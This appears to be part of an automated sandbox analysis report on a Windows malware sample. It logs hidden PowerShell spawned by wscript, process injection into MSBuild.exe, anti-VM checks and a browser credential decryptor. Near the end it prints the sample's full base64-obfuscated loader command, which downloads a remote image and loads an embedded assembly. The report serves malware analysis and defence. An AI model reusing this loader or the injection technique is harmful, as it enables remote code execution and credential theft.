                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2650000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4800000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5803Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4021Jump to behavior
                      Source: C:\Windows\System32\wscript.exe TID: 6460Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6744Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !vmware virtual s scsi disk device
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware svga
                      Source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `2microsoft.win32.taskschedulercalendartriggermicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxservice
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware pointing device<Each value of the array must contain a valid file reference.
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware usb pointing device
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware s
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmusrvc
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware pointing device
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware sata
                      Source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachineDetector
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareArguments
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmsrvc
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtools
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwarexD{
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .metadata.xml!vmware virtual s scsi disk device
                      Source: powershell.exe, 0000000A.00000002.1577845542.000001E8A9D3F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2503617924.0000000000AE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: virtualmachinedetector
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware vmci bus device
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\wscript.exeNetwork Connect: 23.186.113.60 443Jump to behavior
                      Source: Yara matchFile source: amsi64_6852.amsi.csv, type: OTHER
                      Source: Yara matchFile source: amsi64_6852.amsi.csv, type: OTHER
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41A000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41C000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 77B008Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'JABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAA9ACAAJwAwAC8AUwA0AHgAUQBTAFYAWgB4AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMAIAA9ACAAJABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGMAbwB6AGkAbgBlAHMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbABvAHUAbgBnAGkAbgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAbwB1AG4AZwBpAG4AZwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABNAGMASQBuAHQAaQByAGUAIAA9ACAAJABsAG8AdQBuAGcAaQBuAGcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYwBvAHoAaQBuAGUAcwBzACkAOwAkAG0AbwBuAG8AdAByAG8AcABpAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAE0AYwBJAG4AdABpAHIAZQApADsAJAByAGUAYwBvAG0AZgBvAHIAdABsAGUAcwBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABuAG8AZABvAGkAZAAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAAPQAgACQAbQBvAG4AbwB0AHIAbwBwAGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAGMAbwBtAGYAbwByAHQAbABlAHMAcwApADsAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AZABvAGkAZAApADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYgBlAG4AegBvAHQAaABpAGEAegBpAG4AZQBzACAALQBnAHQAIAAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAOwAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAIAArAD0AIAAkAHIAZQBjAG8AbQBmAG8AcgB0AGwAZQBzAHMALgBMAGUAbgBnAHQAaAA7ACQASABhAHQAaABvAHIAIAA9ACAAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAAtACAAJAB1AG4AYwByAGUAYQB0AGkAdgBlADsAJAByAGUAdgBvAGwAdQB0AGkAbwBuAGkAegBlAGQAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdQBuAGMAcgBlAGEAdABpAHYAZQAsACAAJABIAGEAdABoAG8AcgApADsAJABtAGUAbQBvAHIAYQBiAGwAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQB2AG8AbAB1AHQAaQBvAG4AaQB6AGUAZAApADsAJABjAHUAbAB0AHIAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAbQBlAG0AbwByAGEAYgBsAGUAbgBlAHMAcwApADsAJAByAGUAcwBpAHQAdQBhAHQAZQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMALAAnACcALAAnACcALAAnACcALAAnAE0AUwBCAHUAaQBsAGQAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBxAHUAZQByAHUAbABvAHUAcwBuAGUAcwBzAGUAcwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAYwBlAG4AdABpAG0AZQB0AHIAaQBjACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$alJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'jabhagwaygbpagyababvahiabwb1ahmaiaa9acaajwawac8auwa0ahgauqbtafyawgb4ac8azaavaguazqauaguaiwbzageacaavac8aogbzahaaiwajaggajwa7acqabqb1agwadabpagyababvahiabwb1ahmaiaa9acaajabhagwaygbpagyababvahiabwb1ahmaiaatahiazqbwagwayqbjaguaiaanacmajwasacaajwb0accaowakagmabwb6agkabgblahmacwagad0aiaanaggadab0ahaacwa6ac8alwbhahiaywboagkadgblac4abwbyagcalwbkag8adwbuagwabwbhagqalwbuaguadwbfagkabqbhagcazqbfadiamaayaduamaa0adeamwavag4azqb3af8aaqbtageazwblac4aagbwagcajwa7acqababvahuabgbnagkabgbnacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowakagwabwb1ag4azwbpag4azwauaegazqbhagqazqbyahmalgbbagqazaaoaccavqbzaguacgataeeazwblag4adaanacwajwbnag8aegbpagwababhac8anqauadaajwapadsajabnagmasqbuahqaaqbyaguaiaa9acaajabsag8adqbuagcaaqbuagcalgbeag8adwbuagwabwbhagqarabhahqayqaoacqaywbvahoaaqbuaguacwbzackaowakag0abwbuag8adabyag8acabpahmabqagad0aiabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakaakae0aywbjag4adabpahiazqapadsajabyaguaywbvag0azgbvahiadabsaguacwbzacaapqagaccapaa8aeiaqqbtaeuanga0af8auwbuaeeaugbuad4apganadsajabuag8azabvagkazaagad0aiaanadwapabcaeeauwbfadyanabfaeuatgbead4apganadsajab1ag4aywbyaguayqb0agkadgblacaapqagacqabqbvag4abwb0ahiabwbwagkacwbtac4asqbuagqazqb4ae8azgaoacqacgblagmabwbtagyabwbyahqabablahmacwapadsajabiaguabgb6ag8adaboagkayqb6agkabgblahmaiaa9acaajabtag8abgbvahqacgbvahaaaqbzag0algbjag4azablahgatwbmacgajabuag8azabvagkazaapadsajab1ag4aywbyaguayqb0agkadgblacaalqbnaguaiaawacaalqbhag4azaagacqaygblag4aegbvahqaaabpageaegbpag4azqbzacaalqbnahqaiaakahuabgbjahiazqbhahqaaqb2aguaowakahuabgbjahiazqbhahqaaqb2aguaiaarad0aiaakahiazqbjag8abqbmag8acgb0agwazqbzahmalgbmaguabgbnahqaaaa7acqasabhahqaaabvahiaiaa9acaajabiaguabgb6ag8adaboagkayqb6agkabgblahmaiaatacaajab1ag4aywbyaguayqb0agkadgbladsajabyaguadgbvagwadqb0agkabwbuagkaegblagqaiaa9acaajabtag8abgbvahqacgbvahaaaqbzag0algbtahuaygbzahqacgbpag4azwaoacqadqbuagmacgblageadabpahyazqasacaajabiageadaboag8acgapadsajabtaguabqbvahiayqbiagwazqbuaguacwbzacaapqagafsauwb5ahmadablag0algbdag8abgb2aguacgb0af0aoga6aeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakahiazqb2ag8abab1ahqaaqbvag4aaqb6aguazaapadsajabjahuabab0ahiayqb0aguaiaa9acaawwbtahkacwb0aguabqauafiazqbmagwazqbjahqaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoacqabqblag0abwbyageaygbsaguabgblahmacwapadsajabyaguacwbpahqadqbhahqazqbzacaapqagafsazabuagwaaqbiac4asqbpac4asabvag0azqbdac4arwblahqatqblahqaaabvagqakaanafyaqqbjaccakqauaekabgb2ag8aawblacgajabuahuababsacwaiabbag8aygbqaguaywb0afsaxqbdacaaqaaoacqabqb1agwadabpagyababvahiabwb1ahmalaanaccalaanaccalaanaccalaanae0auwbcahuaaqbsagqajwasaccajwasaccajwasaccajwasaccajwasaccaqwa6afwavqbzaguacgbzafwauab1agiababpagmaxabeag8adwbuagwabwbhagqacwanacwajwbxahuazqbyahuababvahuacwbuaguacwbzaguacwanacwajwbqahmajwasaccajwasaccajwasaccaywblag4adabpag0azqb0ahiaaqbjaccalaanadiajwasaccajwapacka' -replace '','';$al
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'jabhagwaygbpagyababvahiabwb1ahmaiaa9acaajwawac8auwa0ahgauqbtafyawgb4ac8azaavaguazqauaguaiwbzageacaavac8aogbzahaaiwajaggajwa7acqabqb1agwadabpagyababvahiabwb1ahmaiaa9acaajabhagwaygbpagyababvahiabwb1ahmaiaatahiazqbwagwayqbjaguaiaanacmajwasacaajwb0accaowakagmabwb6agkabgblahmacwagad0aiaanaggadab0ahaacwa6ac8alwbhahiaywboagkadgblac4abwbyagcalwbkag8adwbuagwabwbhagqalwbuaguadwbfagkabqbhagcazqbfadiamaayaduamaa0adeamwavag4azqb3af8aaqbtageazwblac4aagbwagcajwa7acqababvahuabgbnagkabgbnacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqaowakagwabwb1ag4azwbpag4azwauaegazqbhagqazqbyahmalgbbagqazaaoaccavqbzaguacgataeeazwblag4adaanacwajwbnag8aegbpagwababhac8anqauadaajwapadsajabnagmasqbuahqaaqbyaguaiaa9acaajabsag8adqbuagcaaqbuagcalgbeag8adwbuagwabwbhagqarabhahqayqaoacqaywbvahoaaqbuaguacwbzackaowakag0abwbuag8adabyag8acabpahmabqagad0aiabbafmaeqbzahqaz